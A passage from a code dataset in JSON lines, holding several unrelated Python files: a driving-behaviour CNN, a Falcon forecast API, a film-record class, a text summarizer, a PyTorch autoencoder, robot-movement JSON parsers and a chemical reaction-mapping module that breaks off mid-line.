generator(validation_samples, batch_size=batch_size)\n\ncallbacks = [EarlyStopping(monitor='val_loss', min_delta=0, patience=0, verbose=0, mode='auto', baseline=None,\n restore_best_weights=True)]\n# define model\nmodel = Sequential()\n\n# preprocess input normalize and crop\nmodel.add(Lambda(lambda x: x / 255.0 - 0.5, input_shape=(160, 320, 3)))\nmodel.add(Cropping2D(cropping=((50, 20), (0, 0))))\n\n# add Convolution2D layers\nmodel.add(Convolution2D(filters=24, kernel_size=(5, 5), padding='valid', activation='relu'))\nmodel.add(Convolution2D(filters=36, kernel_size=(5, 5), padding='valid', activation='relu'))\nmodel.add(Convolution2D(filters=48, kernel_size=(5, 5), padding='valid', activation='relu'))\nmodel.add(Convolution2D(filters=64, kernel_size=(3, 3), padding='valid', activation='relu'))\nmodel.add(Convolution2D(filters=64, kernel_size=(3, 3), padding='valid', activation='relu'))\n\n# add fully connected layers\nmodel.add(Flatten())\nmodel.add(Dense(100, activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(Dropout(0.4))\nmodel.add(Dense(50, activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(Dense(50, activation='relu'))\nmodel.add(Dense(10, activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(Dense(1))\n\nmodel.compile(loss='mse', optimizer='adam')\nmodel.fit_generator(train_generator,\n steps_per_epoch=ceil(len(train_samples) / batch_size),\n validation_data=validation_generator,\n validation_steps=ceil(len(validation_samples) / batch_size),\n epochs=5, verbose=1, callbacks=callbacks)\n\n# save result\nmodel.save('model.h5')\n","repo_name":"andriikushch/CarND-Behavioral-Cloning-P3","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"22626426078","text":"import traceback\nimport falcon\nimport structlog\n\nfrom forecast_api.api.ping import PingResource\nfrom forecast_api.api.forecast import ForecastResource\nfrom forecast_api.api.forecast import GenericForecastResource\n\nfrom forecast_api.app import create_container\n\n_log = structlog.get_logger(__name__)\n\n\ndef configure_callable(ini_path=None):\n return create_callable(create_container(ini_path))\n\n\ndef handle_uncaught_exceptions(ex, request, response, params):\n if isinstance(ex, falcon.HTTPError):\n raise ex\n\n _log.error(f'unexpected {ex!r}:\\n{traceback.format_tb(ex.__traceback__)}')\n\n raise falcon.HTTPInternalServerError(\n description='I am sorry Dave, I am afraid, I cannot do that'\n )\n\n\ndef create_callable(container):\n app = falcon.API()\n app.add_route(\n '/alert/ping',\n PingResource()\n )\n app.add_route(\n '/v1/forecast/average',\n ForecastResource(\n container('services.methods.average')\n\n )\n )\n app.add_route(\n '/v1/forecast/holt',\n ForecastResource(\n container('services.methods.holt')\n )\n )\n app.add_route(\n '/v1/forecast/holtwinter',\n ForecastResource(\n container('services.methods.holtwinter')\n )\n )\n app.add_route(\n '/v1/forecast/{forecast_method}',\n GenericForecastResource(\n )\n )\n\n app.add_error_handler(Exception, handle_uncaught_exceptions)\n return app\n","repo_name":"drandrewcsmith/forecast_api","sub_path":"forecast_api/wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32010687362","text":"import os\nclass Film():\n def __init__(self,title,description,director,writter,cast,time,country,language,raiting,year,budget,box,profitable\n ,oscar_nom,oscar_win,trailer):\n self.title=title\n self.description=description\n self.director=director\n self.writter=writter\n self.cast=cast\n self.time=time\n self.country=country\n self.language=language\n self.raiting=raiting\n self.year=year\n self.budget=budget\n self.box=box\n self.profitable=profitable\n self.oscar_nom=oscar_nom\n self.oscar_win=oscar_win\n self.trailer=trailer\n\n def save_info(self):\n return vars(self)\n def upload_file(self):\n mother_dir=\"D:/Python study/pythonProject/Hilel/lesson _15_classes/lesson_14_copy/film_player/film_storage\"\n for dirs in os.listdir(mother_dir):\n if os.path.isdir(os.path.join(mother_dir,dirs)) and dirs==self.save_info()[\"title\"][0]:\n dir_path=os.path.join(mother_dir,dirs)\n with open(dir_path+\"/\"+self.title+\".txt\",\"w\") as f:\n for key,value in self.save_info().items():\n f.write(f\"{key}: {value} \\n\")\n def get_film_address(self):\n mother_dir = \"D:/Python study/pythonProject/Hilel/lesson _15_classes/lesson_14_copy/film_player/film_storage\"\n for dirpath , dirnames , files in os.walk(mother_dir):\n for file in files:\n if file==str(self.title+\".txt\"):\n file_path=os.path.join(dirpath,file)\n return file_path\n\n\n#створення екземпляру класа\nCrazy=Film(\"Crazy, Stupid, Love.\",\"A middle-aged husband's life changes dramatically when his wife asks him for a divorce.\\\n He seeks to rediscover his manhood with the help of a newfound friend, Jacob, learning to pick up girls at bars.\",\n \"Glenn Ficarra John Requa\" , \" Dan Fogelman\",\"Steve Carell Ryan Gosling Julianne Moore\",\n \" 118 minutes\",\n \"United States\",\n \"English\",\n \"7.4\",\n \"2011\",\n \"$50 million\",\n \"$145 million\",\n \" Yes\",\n \" No\",\n \"No\",\n \"https://www.imdb.com/video/vi3722091801/\")\n#створення словника з введеною інформацією екземпляра\nCrazy.save_info()\n#створення файлу тхт у відповідній директорії та наповнення його інформацією отриманою при заповненні ексземпляра\nCrazy.upload_file()\n#ініціація пошуку файлу в теках по попередньо наданій інформації\nprint(Crazy.get_film_address())\n\n","repo_name":"Poprop/pythonProject","sub_path":"Hilel/lesson _15_classes/lesson_14_copy/film_player/films_worker.py","file_name":"films_worker.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3506341950","text":"import nltk\nfrom extractor import Extractor\nimport math\nimport re\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\nimport json \n\nN = 5\nPATH = \"C:/Users/sneha/Desktop/IRProject/bbcsport/dataset/data\"\n\nclass Summarizer:\n \n def getFiles(self):\n onlyfiles = [f for f in listdir(PATH) if isfile(join(PATH, f))]\n return onlyfiles\n\n def getDocTokens(self, document):\n tokens = set()\n e = Extractor(document)\n tokens = set(e.rank_words())\n return tokens\n\n def countFreq(self, document, word):\n return sum(1 for _ in re.finditer(r'\\b%s\\b' % re.escape(word), document.lower()))\n\n def getDocTF(self, document, token):\n freq = self.countFreq(document, token)\n tf = 1 + math.log10(freq) if freq != 0 else 0\n return tf\n\n def calculateIDF(self, corpus, tokens):\n sentences = nltk.sent_tokenize(corpus)\n n = len(sentences)\n idf = {}\n\n for token in tokens:\n idf[token] = 0\n\n for token in tokens:\n for sentence in sentences:\n if token in sentence:\n if token not in idf:\n idf[token] = 0 \n idf[token] += 1\n\n for token in tokens:\n df = idf[token]\n if df != 0:\n idf[token] = math.log10(n/df)\n else:\n idf[token] = 0\n\n return idf\n \n def vectorizeDoc(self, document, tokens, idf):\n tfIdf = []\n for token in tokens:\n tfIdf.append(self.getDocTF(document, token) * idf[token])\n return tfIdf\n\n def normalize(self, docWeights):\n normWeights = docWeights\n if all(i == 0 for i in normWeights):\n return normWeights\n squared = [i ** 2 for i in docWeights]\n normWeights = [float(i)/float(math.sqrt(sum(squared))) for i in docWeights]\n return normWeights\n\n def computeCosine(self, document, tokens, idf, corpus):\n cosine = 0\n docVector = self.normalize(self.vectorizeDoc(document.lower(), tokens, idf))\n for doc in corpus:\n if doc != document:\n vector = self.normalize(self.vectorizeDoc(doc.lower(), tokens, idf))\n result = [a*b for a,b in zip(vector, docVector)]\n cosine += sum(result)\n return cosine\n\n def getSummary(self, tokens, idf, corpus):\n weights = []\n for doc in corpus:\n dict = {}\n cosine = self.computeCosine(doc.lower(), tokens, idf, corpus)\n dict['doc'] = doc\n dict['weight'] = cosine\n weights.append(dict)\n result = sorted(weights, key=lambda k: k['weight'])\n return result[0:N]\n\n def writeIndex(self, index):\n json.dump(index, open(\"C:/Users/sneha/Desktop/IRProject/summary_index.txt\", 'w')) \n\n\n def createSummaryIndex(self):\n index = {}\n for file in self.getFiles():\n tokens = self.getDocTokens((open(PATH + \"/\" + file).read()).lower())\n idf = self.calculateIDF((open(PATH + \"/\" + file).read()).lower(), tokens)\n sentences = nltk.sent_tokenize(open(PATH + \"/\" + file).read())\n first = sentences.pop(0)\n summary = self.getSummary(tokens, idf, sentences)\n result = first\n for i in range(len(summary)):\n result = result + \" \" + summary[i].get('doc')\n result = result.replace('\\n', ' ')\n index[file] = result\n self.writeIndex(index)\n\n\nif __name__==\"__main__\":\n s = Summarizer()\n s.createSummaryIndex()\n ","repo_name":"ac491/Extractive-Multi-Doc-summarizer","sub_path":"summarizer.py","file_name":"summarizer.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"14708120478","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 9 21:10:36 2022\r\n\r\n@author: ABHRANIL\r\n\"\"\"\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\n\r\nclass AutoEncoder(nn.Module):\r\n def __init__(self):\r\n super().__init__()\r\n \r\n self.conv_layer_1 = nn.Conv2d(in_channels = 3, out_channels = 32, kernel_size = 1)\r\n self.conv_layer_2 = nn.Conv2d(in_channels = 32, out_channels = 64, kernel_size = 1)\r\n self.conv_layer_3 = nn.Conv2d(in_channels = 64, out_channels = 128, kernel_size = 1)\r\n \r\n self.act_layer = nn.ReLU()\r\n \r\n self.pool_layer = nn.MaxPool2d(kernel_size = 2, stride = 2)\r\n \r\n self.up_conv_layer_1 = nn.ConvTranspose2d(in_channels = 128, out_channels = 64, kernel_size = 2, stride = 2)\r\n self.up_conv_layer_2 = nn.ConvTranspose2d(in_channels = 64, out_channels = 32, kernel_size = 2, stride = 2) \r\n \r\n def forward(self, x):\r\n z1 = self.conv_layer_1(x)\r\n a1 = self.act_layer(z1)\r\n a1 = self.pool_layer(a1)\r\n z2 = self.conv_layer_2(a1)\r\n a2 = self.act_layer(z2)\r\n y1 = a2 # saving activation before pooling for feature extraction\r\n a2 = self.pool_layer(a2)\r\n z3 = self.conv_layer_3(a2)\r\n a3 = self.act_layer(z3)\r\n y2 = a3 # saving activation for feature extraction\r\n z4 = self.up_conv_layer_1(a3)\r\n a4 = self.act_layer(z4)\r\n z5 = self.up_conv_layer_2(a4)\r\n a5 = self.act_layer(z5)\r\n y = a5\r\n \r\n return y, y1, y2\r\n \r\nclass Model(nn.Module):\r\n \r\n def __init__(self):\r\n super().__init__()\r\n self.auto_encoder = AutoEncoder()\r\n \r\n # layer for upscaling second activation obtained from output of encoder\r\n self.up_scale_layer_1 = nn.ConvTranspose2d(in_channels = 64, out_channels = 32, kernel_size = 2, stride = 2)\r\n \r\n # layer for upscaling third activation obtained from output of encoder\r\n self.up_scale_layer_2 = nn.ConvTranspose2d(in_channels = 128, out_channels = 32, kernel_size = 4, stride = 4)\r\n \r\n # main convolutional model\r\n self.conv_layer = nn.Conv2d(in_channels = 192, out_channels = 3, kernel_size = 1)\r\n self.act_layer = nn.ReLU()\r\n \r\n def forward(self, x1, x2):\r\n \r\n y1, y1_1, y1_2 = self.auto_encoder(x1)\r\n y2, y2_1, y2_2 = self.auto_encoder(x1)\r\n \r\n y = torch.concat((y1, y2), dim = 0)\r\n \r\n y1_1 = self.up_scale_layer_1(y1_1)\r\n y2_1 = self.up_scale_layer_1(y2_1)\r\n y_1 = torch.concat((y1_1, y2_1), dim = 0)\r\n \r\n y1_2 = self.up_scale_layer_1(y1_2)\r\n y2_2 = self.up_scale_layer_1(y2_2)\r\n y_2 = torch.concat((y1_2, y2_2), dim = 0)\r\n \r\n x = torch.concat((y, y_1, y_2), dim = 0)\r\n \r\n z1 = self.conv_layer(x)\r\n a1 = self.act_layer(z1)\r\n out = a1\r\n \r\n return out\r\n \r\ndef obtain_model(device = torch.device('cpu')):\r\n return Model().to(device)","repo_name":"DrDoofenshmrtz/FPSBooster","sub_path":"Model/ModelComponents/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73201099145","text":"import json\nfrom typing import Dict, Any\n\nfrom preprocessing.movement import SimpleMovement, LinearMovement, JointMovement, Movement, CompoundMovement\nfrom preprocessing.position import Position\nfrom preprocessing.robot import Robot\nfrom utils.bad_input_file_error import BadInputFileError\nfrom utils.geometry_3d import Point3D\n\n\ndef read_json_from_file(filename: str) -> Any:\n with open(filename) as file:\n data = json.load(file)\n return data\n\n\ndef save_to_json_file(filename: str, data: Any):\n with open(filename, \"w\") as file:\n json.dump(data, file)\n\n\ndef point3d_from_json(point_json: Dict) -> Point3D:\n return Point3D(point_json['x'], point_json['y'], point_json['z'])\n\n\ndef robot_from_json(robot_json: Dict) -> Robot:\n return Robot(\n robot_json['id'],\n point3d_from_json(robot_json['position']),\n robot_json['weight'],\n robot_json['load_capacity'],\n robot_json['input_power'],\n )\n\n\ndef simple_movement_from_partial_json(\n partial_movement_json: Dict,\n payload_weight: float,\n robot: Robot,\n) -> SimpleMovement:\n movement_type = partial_movement_json['movement_type']\n start = partial_movement_json['start']\n end = partial_movement_json['end']\n\n if movement_type == 'linear':\n return LinearMovement(start, end, payload_weight, robot)\n elif movement_type == 'joint':\n return JointMovement(start, end, payload_weight, robot)\n else:\n raise BadInputFileError(\n 'Partial movement type must be \"linear\" or \"joint\", not {}'.format(movement_type)\n )\n\n\ndef linear_movement_from_json(json_dict: Dict, robots: Dict[str, Robot]) -> Movement:\n return LinearMovement(\n point3d_from_json(json_dict['start']),\n point3d_from_json(json_dict['end']),\n json_dict['mass'],\n robots[json_dict['robot_id']]\n )\n\n\ndef joint_movement_from_json(json_dict: Dict, robots: Dict[str, Robot]) -> Movement:\n return JointMovement(\n point3d_from_json(json_dict['start']),\n point3d_from_json(json_dict['end']),\n json_dict['mass'],\n robots[json_dict['robot_id']]\n )\n\n\ndef compound_movement_from_json(json_dict: Dict, robots: Dict[str, Robot]) -> Movement:\n mass = json_dict['mass']\n robot = robots[json_dict['robot_id']]\n part_movements = [\n simple_movement_from_partial_json(partial_json, mass, robot)\n for partial_json in json_dict['parts']\n ]\n\n return CompoundMovement(part_movements, mass, robot)\n\n\ndef movement_from_json(json_dict: Dict, robots: Dict[str, Robot]) -> Movement:\n if json_dict['movement_type'] == 'linear':\n return linear_movement_from_json(json_dict, robots)\n elif json_dict['movement_type'] == 'joint':\n return joint_movement_from_json(json_dict, robots)\n elif json_dict['movement_type'] == 'compound':\n return compound_movement_from_json(json_dict, robots)\n else:\n raise BadInputFileError(\n 'Movement type must be \"linear\", \"joint\", or \"compound\", not \"{}\"'.format(json_dict['movement_type'])\n )\n\n\ndef position_from_json(json_dict: Dict, robots: Dict[str, Robot]) -> Position:\n return Position(\n point3d_from_json(json_dict['coordinates']),\n json_dict['mass'],\n robots[json_dict['robot_id']],\n )\n","repo_name":"kotliluk/rce-optimizer","sub_path":"utils/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40177968611","text":"from MainFunctions import *\nfrom BalanceRxns import *\n\nfrom collections import OrderedDict #Preserve order of keys relative to reaction from left to right\nfrom rdkit import Chem\nfrom rdkit.Chem import rdChemReactions #Reaction processing\nimport copy\nfrom rxnmapper import RXNMapper #Importing RXNMapper for unsupervised atom mapping\nimport pandas as pd\nimport rdkit\n#%% Reaction Mapping\n\ndef maprxn(rxns):\n \"\"\"\n For a given list of reactions, rxns, returns mapped reactions with confidence scores.\n Uses IBM transformer model.\n\n Parameters\n ----------\n rxns : list\n List of reaction SMILES (no reactant/reagent split)\n\n Returns\n -------\n Output : list\n Mapped reactions with confidence scores\n\n mapped_rxn: str\n Mapped reaction SMARTS\n\n confidence: str\n Model confidence in the mapping rxn\n\n ['Error']: list\n If code doesn't run or mapper doesn't work\n \"\"\"\n\n rxn_mapper=RXNMapper()\n try:\n return rxn_mapper.get_attention_guided_atom_maps(rxns)\n except Exception:\n return ['Error']\n\ndef maprxns(row):\n '''\n Applies maprxn to each row of a dataframe\n\n '''\n balrxnsmiles=''\n balrxnsmiles=row['balrxnsmiles']\n mappedrxn=maprxn([balrxnsmiles])[0]\n if mappedrxn=='Error':\n return 'Error','Error'\n else:\n mapped_rxn=mappedrxn.get('mapped_rxn')\n conf=mappedrxn.get('confidence')\n return mapped_rxn,conf\n\n\ndef map_rxns(analoguerxnsbalfilt,refmappedrxns=None,ncpus=16,restart=True,reaxys_update=True): #Done\n '''\n Applies maprxn to a given dataframe\n\n '''\n # breakpoint()\n if not analoguerxnsbalfilt.index.name and (not analoguerxnsbalfilt.index.names or None in analoguerxnsbalfilt.index.names):\n idxreset=True\n else:\n idxreset=False\n idxcol=[]\n if reaxys_update:\n idxcol=['ReactionID','Instance']\n else:\n idxcol=['ReactionID']\n if refmappedrxns is not None:\n analoguerxnsbalfilt,commondf=userefrxns(analoguerxnsbalfilt,idxcol=idxcol,refanaloguerxns=refmappedrxns)\n idxreset=False\n if not analoguerxnsbalfilt.empty:\n if ncpus>1:\n if restart:\n initray(num_cpus=ncpus)\n if not idxreset:\n analoguerxnsbalfilt.reset_index(inplace=True)\n idxreset=True\n analoguerxnsbalfiltdis=mpd.DataFrame(analoguerxnsbalfilt)\n else:\n analoguerxnsbalfiltdis=analoguerxnsbalfilt\n mappedrxns=analoguerxnsbalfiltdis.apply(maprxns,axis=1,result_type='reduce')\n mappedrxns=pd.DataFrame(data=mappedrxns.values,index=mappedrxns.index,columns=['mappedrxns'])\n mappedrxns[['mapped_rxn','confidence']]=pd.DataFrame(mappedrxns['mappedrxns'].tolist(),index=mappedrxns.index)\n mappedrxns.drop(columns=['mappedrxns'],inplace=True)\n analoguerxnsmapped=copy.deepcopy(analoguerxnsbalfilt)\n analoguerxnsmapped[['mapped_rxn','confidence']]=mappedrxns\n # breakpoint()\n if idxreset:\n analoguerxnsmapped.set_index(idxcol,inplace=True)\n if refmappedrxns is not None and not commondf.empty:\n analoguerxnsmapped=pd.concat([analoguerxnsmapped,commondf])\n else:\n analoguerxnsmapped=commondf\n return analoguerxnsmapped\n\n\ndef checkrxns(analoguerxnsmappedfilt,refparsedrxns=None,ncpus=16,updateall=True,removeunmapped=True,restart=True,\n reaxys_update=True): #Done\n if not analoguerxnsmappedfilt.index.name and (not analoguerxnsmappedfilt.index.names or None in analoguerxnsmappedfilt.index.names):\n idxreset=True\n else:\n idxreset=False\n idxcol=[]\n if reaxys_update:\n idxcol=['ReactionID','Instance']\n else:\n idxcol=['ReactionID']\n if refparsedrxns is not None:\n analoguerxnsmappedfilt,commondf=userefrxns(analoguerxnsmappedfilt,idxcol=idxcol,refanaloguerxns=refparsedrxns)\n idxreset=False\n if not analoguerxnsmappedfilt.empty:\n if ncpus>1:\n if restart:\n initray(num_cpus=ncpus)\n if not idxreset:\n analoguerxnsmappedfilt.reset_index(inplace=True)\n idxreset=True\n analoguerxnsmappedfiltdis=mpd.DataFrame(analoguerxnsmappedfilt)\n else:\n analoguerxnsmappedfiltdis=analoguerxnsmappedfilt\n compdupdate=analoguerxnsmappedfiltdis.apply(checkrxnrow,updateall=updateall,removeunmapped=removeunmapped,axis=1,result_type='reduce')\n compdupdate=pd.Series(data=compdupdate.values,index=compdupdate.index) #Optional convert modin back to pandas\n compdupdatedf=pd.DataFrame(data=compdupdate.tolist(),index=compdupdate.index,columns=['LHSdata','RHSdata','msg1'])\n analoguerxnsparsed=copy.deepcopy(analoguerxnsmappedfilt)\n analoguerxnsparsed[['LHSdata','RHSdata','msg1']]=compdupdatedf\n if idxreset:\n analoguerxnsparsed.set_index(idxcol,inplace=True)\n if refparsedrxns is not None and not commondf.empty:\n analoguerxnsparsed=pd.concat([analoguerxnsparsed,commondf])\n else:\n analoguerxnsparsed=commondf\n return analoguerxnsparsed\n\ndef checkrxnrow(row,updateall=True,removeunmapped=True):\n # breakpoint()\n mappedrxn=row['mapped_rxn']\n Rdata=row['LHSdata']\n Pdata=row['RHSdata']\n msg=row['msg']\n if 'with species' in msg:\n mandrcts=set(Rdata.keys())-set([int(addedspec) for addedspec in msg.rsplit('with species: ',1)[1].split(' with help product(s): ')[0].split(',')])\n else:\n mandrcts=set(Rdata.keys())\n if 'With hydrogen carriers' in msg:\n hcarriers=[int(hcarrier) for hcarrier in msg.split('With hydrogen carriers: ')[1].split(', ')[0].split(',')]\n else:\n hcarriers=[]\n if 'Mandatory' in msg:\n mandrcts=mandrcts.union({int(mandrct) for mandrct in msg.split('Mandatory species unmapped from LHS: ')[1].split(', ')[0].split(',')})\n res=checkrxn(mappedrxn,Rdata=Rdata,Pdata=Pdata,updateall=updateall,removeunmapped=removeunmapped,mandrcts=mandrcts,hcarriers=hcarriers)\n\n return res\n\n\n\ndef checkrxn(mappedrxn,Rdata={},Pdata={},ordered=True,updateall=True,removeunmapped=True,mandrcts=[],mandprods=[],hcarriers=[]): #Assume same rxn smiles stored next to each other\n '''\n Checks reaction, updating mapped and clean molecules, removing unmapped species\n\n '''\n # breakpoint()\n try:\n rdrxn=rdChemReactions.ReactionFromSmarts(mappedrxn,useSmiles=True)\n except Exception:\n return Rdata,Pdata,'Error'\n cleanrxn=copy.copy(rdrxn)\n rdChemReactions.RemoveMappingNumbersFromReactions(cleanrxn)\n if ordered:\n LHSdata=OrderedDict({})\n RHSdata=OrderedDict({})\n else:\n LHSdata={}\n RHSdata={}\n msgr=[]\n msgp=[]\n # Updating LHSdata\n if Rdata:\n rsmilesfreq=gensmilesfreq(Rdata)\n smilesmismatch=[]\n rmixtures={}\n mismatch=False\n for ID,rct in enumerate(cleanrxn.GetReactants()):\n mappedmol=rdrxn.GetReactants()[ID]\n formula=rdkit.Chem.rdMolDescriptors.CalcMolFormula(rct)\n if removeunmapped:\n if any([atom.HasProp('molAtomMapNumber') for atom in mappedmol.GetAtoms()]) or formula=='H2' or hcarriers: #Confirmed, mapped reactant\n LHSdata,rmixtures,msg_,ID0=updatespecdict(Rdata,rsmilesfreq,rct,mappedmol,updateddict=LHSdata,mixtures=rmixtures,updateall=updateall,hcarriers=hcarriers)\n if msg_!='Valid':\n # if ID0 not in smilesmismatch:\n # smilesmismatch+=[ID0]\n mismatch=True\n else:\n LHSdata,rmixtures,msg_,ID0=updatespecdict(Rdata,rsmilesfreq,rct,mappedmol,updateddict=LHSdata,mixtures=rmixtures,updateall=updateall,hcarriers=hcarriers)\n if msg_!='Valid':\n # if ID0 not in smilesmismatch:\n # smilesmismatch+=[ID0]\n mismatch=True\n if mismatch:\n smilesmismatch=[ID0 for ID0 in Rdata if ID0 not in LHSdata and ID0 not in rmixtures]\n if smilesmismatch:\n msgr+=['Smiles discrepancy for LHS species: '+', '.join([str(ID) for ID in smilesmismatch])]\n else:\n msgr+=['Smiles discrepancy for LHS species']\n # breakpoint()\n if rmixtures:\n msgr+=['Mixture detected for LHS species: '+','.join([str(ID) for ID in rmixtures])]\n for ID0 in rmixtures:\n localcounts=[int(Counter(rsmilesfreq[mixsmiles])[ID0]) for mixsmiles in rmixtures[ID0]]\n numinsts=[len(rmixtures[ID0][mixsmiles]) for mixsmiles in rmixtures[ID0]]\n lb=[0 for j in range(len(numinsts))]\n ub=[0 for j in range(len(numinsts))]\n div=[int(ceil(numinst/localcount)) for numinst,localcount in zip(numinsts,localcounts)]\n count=max(div)\n if updateall:\n LHSdata[ID0].update({'mappedsmiles':[],'cleanmol':[],'unmappedmix':[]})\n for i in range(count):\n mappedsmiles=[]\n unmappedsmiles=[]\n cleanmol=[]\n for j,mixsmiles in enumerate(rmixtures[ID0]):\n ub_=min(numinsts[j],localcounts[j])\n ub[j]=ub_+lb[j]\n mappedlist=rmixtures[ID0][mixsmiles][lb[j]:ub[j]]\n mappedsmiles+=[comb[0] for comb in mappedlist]\n cleanmol+=[comb[1] for comb in mappedlist]\n mappedsmiles=tuple(mappedsmiles)\n cleanmol=tuple(cleanmol)\n unmappedsmiles=tuple([mixsmiles for mixsmiles in rsmilesfreq for k in range(int(Counter(rsmilesfreq[mixsmiles])[ID0])) if mixsmiles in Rdata[ID0]['smiles'] if mixsmiles not in rmixtures[ID0]])\n LHSdata[ID0]['mappedsmiles'].extend([mappedsmiles])\n LHSdata[ID0]['cleanmol'].extend([cleanmol])\n LHSdata[ID0]['unmappedmix'].extend([unmappedsmiles])\n lb=copy.deepcopy(ub)\n LHSdata[ID0]['count']=count\n if removeunmapped:\n rem=Counter()\n Rspecies=Counter([ID0 for ID0 in Rdata for _ in range(Rdata[ID0]['count'])])\n LHSspecies=Counter([ID0 for ID0 in LHSdata for _ in range(LHSdata[ID0]['count'])])\n rem.update(Rspecies)\n rem.subtract(LHSspecies)\n # removedmandrcts=[ID0 for ID0 in rem if ID0 in mandrcts if ID0 not in LHSspecies]\n # removedrcts=[ID0 for ID0 in rem if ID0 not in removedmandrcts if ID0 not in smilesmismatch if ID0 in Rspecies if ID0 not in LHSspecies]\n removedrcts=[ID0 for ID0 in rem if ID0 in Rspecies if ID0 not in LHSspecies if ID0 not in smilesmismatch]\n removedmandrcts=[ID0 for ID0 in removedrcts if ID0 in mandrcts]\n #New\n removedmandrcts=list(set(removedmandrcts).union({mandrct for mandrct in mandrcts if mandrct not in LHSspecies}))\n #New\n runmapped=[ID0 for ID0 in rem if rem[ID0]>0 if ID0 not in removedrcts if ID0 not in smilesmismatch] #!=0\n if removedmandrcts:\n msgr+=['Mandatory species unmapped from LHS: '+', '.join([str(ID) for ID in removedmandrcts])]\n removedrcts=[ID0 for ID0 in removedrcts if ID0 not in removedmandrcts]\n if removedrcts:\n msgr+=['Unmapped species from LHS: '+', '.join([str(ID) for ID in removedrcts])]\n if runmapped:\n msgr+=['Unmapped species instances from LHS: '+', '.join([str(ID) for ID in runmapped])]\n if Pdata:\n # breakpoint()\n psmilesfreq=gensmilesfreq(Pdata)\n smilesmismatch=[]\n pmixtures={}\n mismatch=False\n for ID,prod in enumerate(cleanrxn.GetProducts()):\n mappedmol=rdrxn.GetProducts()[ID]\n # formula=rdkit.Chem.rdMolDescriptors.CalcMolFormula(prod)\n if removeunmapped:\n if any([atom.HasProp('molAtomMapNumber') for atom in mappedmol.GetAtoms()]): #Confirmed, mapped reactant\n RHSdata,pmixtures,msg_,ID0=updatespecdict(Pdata,psmilesfreq,prod,mappedmol,updateddict=RHSdata,mixtures=pmixtures,updateall=updateall)\n if msg_!='Valid':\n # if ID0 not in smilesmismatch:\n # smilesmismatch+=[ID0]\n mismatch=True\n else:\n RHSdata,pmixtures,msg_,ID0=updatespecdict(Pdata,psmilesfreq,prod,mappedmol,updateddict=RHSdata,mixtures=pmixtures,updateall=updateall)\n if msg_!='Valid':\n # if ID0 not in smilesmismatch:\n # smilesmismatch+=[ID0]\n mismatch=True\n if mismatch:\n smilesmismatch=[ID0 for ID0 in Pdata if ID0 not in RHSdata and ID0 not in pmixtures]\n if smilesmismatch:\n msgp+=['Smiles discrepancy for RHS species: '+', '.join([str(ID) for ID in smilesmismatch])]\n else:\n msgp+=['Smiles discrepancy for RHS species']\n if pmixtures:\n msgp+=['Mixture detected for RHS species: '+','.join([str(ID) for ID in pmixtures])]\n # breakpoint()\n for ID0 in pmixtures:\n localcounts=[int(Counter(psmilesfreq[mixsmiles])[ID0]) for mixsmiles in pmixtures[ID0]]\n numinsts=[len(pmixtures[ID0][mixsmiles]) for mixsmiles in pmixtures[ID0]]\n lb=[0 for j in range(len(numinsts))]\n ub=[0 for j in range(len(numinsts))]\n div=[int(ceil(numinst/localcount)) for numinst,localcount in zip(numinsts,localcounts)]\n count=max(div)\n if updateall:\n RHSdata[ID0].update({'mappedsmiles':[],'cleanmol':[],'unmappedmix':[]})\n for i in range(count):\n mappedsmiles=[]\n unmappedsmiles=[]\n cleanmol=[]\n for j,mixsmiles in enumerate(pmixtures[ID0]):\n ub_=min(numinsts[j],localcounts[j])\n ub[j]=ub_+lb[j]\n mappedlist=pmixtures[ID0][mixsmiles][lb[j]:ub[j]]\n mappedsmiles+=[comb[0] for comb in mappedlist]\n cleanmol+=[comb[1] for comb in mappedlist]\n mappedsmiles=tuple(mappedsmiles)\n cleanmol=tuple(cleanmol)\n unmappedsmiles=tuple([mixsmiles for mixsmiles in psmilesfreq for k in range(int(Counter(psmilesfreq[mixsmiles])[ID0])) if mixsmiles in Pdata[ID0]['smiles'] if mixsmiles not in pmixtures[ID0]])\n RHSdata[ID0]['mappedsmiles'].extend([mappedsmiles])\n RHSdata[ID0]['cleanmol'].extend([cleanmol])\n RHSdata[ID0]['unmappedmix'].extend([unmappedsmiles])\n lb=copy.deepcopy(ub)\n RHSdata[ID0]['count']=count\n if removeunmapped:\n rem=Counter()\n Pspecies=Counter([ID0 for ID0 in Pdata for _ in range(Pdata[ID0]['count'])])\n RHSspecies=Counter([ID0 for ID0 in RHSdata for _ in range(RHSdata[ID0]['count'])])\n rem.update(Pspecies)\n rem.subtract(RHSspecies)\n # removedmandprod=[ID0 for ID0 in rem if ID0 in mandprods if ID0 not in RHSspecies]\n # removedprods=[ID0 for ID0 in rem if ID0 not in removedmandprod if ID0 not in smilesmismatch if ID0 in Pspecies if ID0 not in RHSspecies]\n removedprods=[ID0 for ID0 in rem if ID0 in Pspecies if ID0 not in RHSspecies if ID0 not in smilesmismatch]\n removedmandprods=[ID0 for ID0 in removedprods if ID0 in mandprods]\n punmapped=[ID0 for ID0 in rem if rem[ID0]>0 if ID0 not in removedprods if ID0 not in smilesmismatch] #!=0\n if removedmandprods:\n msgp+=['Mandatory species unmapped from RHS: '+', '.join([str(ID) for ID in removedmandprods])]\n removedprods=[ID0 for ID0 in removedprods if ID0 not in removedmandprods]\n if removedprods:\n 